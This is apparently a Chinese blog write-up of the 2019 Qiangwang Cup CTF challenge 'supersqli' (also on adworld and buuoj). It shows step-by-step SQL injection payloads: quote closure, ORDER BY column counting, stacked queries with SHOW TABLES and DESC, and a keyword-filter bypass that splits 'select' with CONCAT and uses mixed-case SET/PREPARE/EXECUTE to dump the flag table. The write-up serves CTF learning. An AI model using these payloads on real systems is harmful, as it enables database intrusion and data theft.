2019年强网杯“随便注”

6 篇文章 0 订阅
5 篇文章 0 订阅
本文介绍了SQL注入攻击的一种场景,通过测试闭合、联合查询等方法发现过滤机制。接着,利用堆叠注入和预编译命令(如SET、PREPARE、EXECUTE)来绕过过滤,尝试获取数据库信息。虽然某些命令被过滤,但通过大小写混淆和组合技术,最终成功获取了表结构。文章展示了在安全防护下进行SQL注入的复杂性和策略。
摘要由CSDN通过智能技术生成

地址:
攻防世界:web 进阶区supersqli
buuoj.cn也有

在这里插入图片描述
很显然是注入。
先测试闭合
1’--------------错误
1’ # -----------------正确
单引号闭合

获得 列数:
1’ order by 1 #
1’ order by 2 #
1’ order by 3 # ----------------- 错误

union联合查询。。
发现报错了。。

1’ union select 1,database() #

在这里插入图片描述
就说 过滤了 select、updata等字符串
我常用的方法 都给我 过滤掉了。。。

新姿势

利用堆叠注入绕过过滤

就是 一次执行多个命令。

1‘ ;show tables#

在这里插入图片描述

1' ;desc `1919810931114514` # 


desc 是一个MySQL命令:
查询表结构的详细信息


使用格式 :
desc 表名
desc columns from 表名 
获得表的结构

在这里插入图片描述
看到 flag, flag 存在于 1919810931114514表达的flag字段。

desc 命令用不了的,,

新姿势

预编译

预编译相关语法:

set用于设置变量名和值
prepare用于预备一个语句,并赋予名称,以后可以引用该语句
execute执行语句
deallocate prepare用来释放掉预处理的语句

1' ; set @sql = Concat('se','lect * from `1919810931114514`;');prepare stmt from @sql;EXECUTE stmt;#



拆开分析:
1’ ;
set @sql = CONCAT('se','lect * from `1919810931114514`;');
prepare stmt from @sql;
EXCUTE stmt;

在这里插入图片描述
检测到了 set 和 prepare 但是strstr 不能区分大小写

1';Set @sql = CONCAT('se','lect * from `1919810931114514`;');Prepare stmt from @sql;EXECUTE stmt;#

拆开来分析:
1';
Set @sql = CONCAT('se','lect * from `1919810931114514`;');
Prepare stmt from @sql;
EXECUTE stmt;

网上还有另一种绕过select 的方法 是更改表明列名 。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tutou_hao

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值